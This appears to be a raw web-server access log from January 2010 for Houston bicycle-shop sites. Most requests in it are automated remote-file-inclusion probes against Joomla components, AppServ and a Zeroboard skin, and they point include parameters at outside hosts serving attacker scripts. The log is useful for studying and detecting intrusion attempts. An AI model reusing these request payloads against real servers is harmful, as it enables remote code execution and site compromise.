79.170.45.126 - - [11/Jan/2010:16:18:32 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:16:18:32 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:16:18:36 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.92.181.165 - - [11/Jan/2010:16:22:54 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "HolmesBot (http://holmes.ge)" "www.svbikes.com"
79.170.45.126 - - [11/Jan/2010:16:23:26 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.111.183 - - [11/Jan/2010:16:24:52 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.111.183 - - [11/Jan/2010:16:24:54 -0800] "GET /bullitinboard/viewtopic.php?p=15317 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
79.170.45.126 - - [11/Jan/2010:16:25:36 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.37.114 - - [11/Jan/2010:16:26:21 -0800] "GET /translations/Italian.txt HTTP/1.0" 200 33975 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
67.195.111.183 - - [11/Jan/2010:17:12:56 -0800] "GET /bullitinboard/viewtopic.php?p=15513 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
211.62.35.55 - - [11/Jan/2010:17:15:08 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.62.35.55 - - [11/Jan/2010:17:15:08 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.62.35.55 - - [11/Jan/2010:17:15:08 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.80.108.81 - - [11/Jan/2010:17:15:36 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
220.80.108.81 - - [11/Jan/2010:17:15:37 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 200 1764 "-" "libwww-perl/5.833" "houstonbikeshop.com"
220.80.108.81 - - [11/Jan/2010:17:15:38 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 200 2373 "-" "libwww-perl/5.833" "houstonbikeshop.com"
211.62.35.55 - - [11/Jan/2010:17:16:47 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.62.35.55 - - [11/Jan/2010:17:16:47 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.62.35.55 - - [11/Jan/2010:17:16:47 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.80.108.81 - - [11/Jan/2010:17:23:30 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
220.80.108.81 - - [11/Jan/2010:17:23:31 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 200 1764 "-" "libwww-perl/5.833" "houstonbikeshop.com"
220.80.108.81 - - [11/Jan/2010:17:23:32 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 200 2373 "-" "libwww-perl/5.833" "houstonbikeshop.com"
67.195.111.183 - - [11/Jan/2010:17:33:21 -0800] "GET /bullitinboard/viewtopic.php?p=4303 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
220.80.108.81 - - [11/Jan/2010:17:50:40 -0800] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
220.80.108.81 - - [11/Jan/2010:17:50:41 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
220.80.108.81 - - [11/Jan/2010:17:50:41 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
220.80.108.81 - - [11/Jan/2010:17:51:29 -0800] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
220.80.108.81 - - [11/Jan/2010:17:51:29 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
220.80.108.81 - - [11/Jan/2010:17:51:30 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
204.202.2.23 - - [11/Jan/2010:17:52:27 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
204.202.2.23 - - [11/Jan/2010:17:52:27 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
204.202.2.23 - - [11/Jan/2010:17:52:28 -0800] "GET /logs/access.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Jan/2010:17:55:09 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Jan/2010:17:55:09 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Jan/2010:17:55:12 -0800] "GET /logs/access.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Jan/2010:17:55:19 -0800] "GET /logs/access.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Jan/2010:17:55:19 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Jan/2010:17:55:22 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Jan/2010:17:55:29 -0800] "GET /logs/access.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
204.202.2.23 - - [11/Jan/2010:17:56:35 -0800] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:17:56:43 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:17:56:43 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:17:56:43 -0800] "GET /logs/access.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:17:56:45 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:17:56:45 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:17:56:45 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Jan/2010:17:57:15 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Jan/2010:17:57:21 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:17:57:25 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:17:57:25 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:17:57:30 -0800] "GET /logs/access.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:17:58:29 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:17:58:29 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:17:58:32 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:17:58:54 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:17:58:54 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:17:58:54 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.80.108.81 - - [11/Jan/2010:18:03:26 -0800] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
220.80.108.81 - - [11/Jan/2010:18:03:26 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
220.80.108.81 - - [11/Jan/2010:18:03:27 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
110.45.136.177 - - [11/Jan/2010:18:06:47 -0800] "GET /bbs//skin/zero_vote/login.php?dir=http://www.fileden.com/files/2009/12/18/2693460/ketek?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
110.45.136.177 - - [11/Jan/2010:18:06:47 -0800] "GET /logs//bbs//skin/zero_vote/login.php?dir=http://www.fileden.com/files/2009/12/18/2693460/ketek?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
110.45.136.177 - - [11/Jan/2010:18:06:47 -0800] "GET /logs/access.log//bbs//skin/zero_vote/login.php?dir=http://www.fileden.com/files/2009/12/18/2693460/ketek?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.115.6.15 - - [11/Jan/2010:18:13:58 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "svbikes.com"
220.80.108.81 - - [11/Jan/2010:18:16:35 -0800] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
220.80.108.81 - - [11/Jan/2010:18:16:36 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
220.80.108.81 - - [11/Jan/2010:18:16:36 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
195.5.163.207 - - [11/Jan/2010:18:26:32 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.5.163.207 - - [11/Jan/2010:18:26:32 -0800] "GET /logs//appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.5.163.207 - - [11/Jan/2010:18:26:32 -0800] "GET /appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:18:31:06 -0800] "GET /logs/access.log//main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:18:31:06 -0800] "GET /main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:18:31:06 -0800] "GET /logs//main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:18:31:06 -0800] "GET /logs/access.log//main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:18:31:06 -0800] "GET /logs//main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:18:31:06 -0800] "GET /main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:18:31:50 -0800] "GET /main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:18:31:55 -0800] "GET /logs/access.log//main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:18:31:55 -0800] "GET /logs//main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:18:31:58 -0800] "GET /logs/access.log//main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:18:31:58 -0800] "GET /logs//main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:18:31:58 -0800] "GET /main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Jan/2010:18:32:06 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Jan/2010:18:32:09 -0800] "GET /main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Jan/2010:18:32:09 -0800] "GET /logs//main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Jan/2010:18:32:47 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Jan/2010:18:32:47 -0800] "GET /logs//main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Jan/2010:18:32:51 -0800] "GET /main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:18:42:50 -0800] "GET /logs//main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:18:42:55 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.130.250.246 - - [11/Jan/2010:18:42:55 -0800] "GET /main.php?sayfa=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:18:57:01 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:18:57:01 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:18:57:01 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
110.45.136.177 - - [11/Jan/2010:18:57:31 -0800] "GET /bbs//skin/zero_vote/login.php?dir=http://www.fileden.com/files/2009/12/18/2693460/ketek?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
110.45.136.177 - - [11/Jan/2010:18:57:31 -0800] "GET /logs//bbs//skin/zero_vote/login.php?dir=http://www.fileden.com/files/2009/12/18/2693460/ketek?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
110.45.136.177 - - [11/Jan/2010:18:57:31 -0800] "GET /logs/access.log//bbs//skin/zero_vote/login.php?dir=http://www.fileden.com/files/2009/12/18/2693460/ketek?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.47.7.71 - - [11/Jan/2010:19:02:44 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.47.7.71 - - [11/Jan/2010:19:02:44 -0800] "GET /logs//main.php?sayfa=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.47.7.71 - - [11/Jan/2010:19:02:44 -0800] "GET /main.php?sayfa=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.47.7.71 - - [11/Jan/2010:19:02:50 -0800] "GET /main.php?sayfa=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.47.7.71 - - [11/Jan/2010:19:02:57 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.47.7.71 - - [11/Jan/2010:19:02:57 -0800] "GET /logs//main.php?sayfa=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:19:03:25 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:19:03:31 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:19:03:31 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:19:03:31 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:19:05:52 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.88.25.28 - - [11/Jan/2010:19:06:24 -0800] "GET /temporarypreviewfile.html HTTP/1.1" 200 1706 "-" "Yandex/1.01.001 (compatible; Win16; I)" "bicyclestoreshouston.com"
61.106.21.35 - - [11/Jan/2010:19:06:28 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.106.21.35 - - [11/Jan/2010:19:06:28 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.106.21.35 - - [11/Jan/2010:19:06:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.106.21.35 - - [11/Jan/2010:19:06:31 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.106.21.35 - - [11/Jan/2010:19:06:31 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.106.21.35 - - [11/Jan/2010:19:06:32 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.106.21.35 - - [11/Jan/2010:19:06:32 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.106.21.35 - - [11/Jan/2010:19:06:32 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
